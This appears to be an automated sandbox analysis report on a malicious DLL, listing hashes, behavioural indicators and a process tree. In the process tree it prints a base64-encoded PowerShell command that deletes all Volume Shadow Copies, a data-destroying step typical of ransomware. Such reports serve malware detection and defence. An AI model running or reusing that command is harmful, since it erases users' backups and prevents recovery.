Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 01:06
Static task
static1
Behavioral task
behavioral1
Sample
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll
Resource
win10-en-20211208
General
-
Target
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll
-
Size
166KB
-
MD5
191fe230379a863d754bf84dbacc52bf
-
SHA1
169ddded3a4e59ceab433deb66b03e4af8576fa3
-
SHA256
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02
-
SHA512
85afdc57d6f71781a7749f40867ee167ba26dc5c7e38352b0c960106227d3838fc1fc71cdbc19fa50654f2d9db94d9d66d1a31b7060b3fea70be8b73d766f157
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\F: rundll32.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0aceb8fc010d801 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2036 rundll32.exe 2036 rundll32.exe 1748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1748 powershell.exe Token: SeBackupPrivilege 964 vssvc.exe Token: SeRestorePrivilege 964 vssvc.exe Token: SeAuditPrivilege 964 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1656 wrote to memory of 2036 1656 rundll32.exe 27 PID 1656 wrote to memory of 2036 1656 rundll32.exe 27 PID 1656 wrote to memory of 2036 1656 rundll32.exe 27 PID 1656 wrote to memory of 2036 1656 rundll32.exe 27 PID 1656 wrote to memory of 2036 1656 rundll32.exe 27 PID 1656 wrote to memory of 2036 1656 rundll32.exe 27 PID 1656 wrote to memory of 2036 1656 rundll32.exe 27 PID 2036 wrote to memory of 1748 2036 rundll32.exe 28 PID 2036 wrote to memory of 1748 2036 rundll32.exe 28 PID 2036 wrote to memory of 1748 2036 rundll32.exe 28 PID 2036 wrote to memory of 1748 2036 rundll32.exe 28
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:964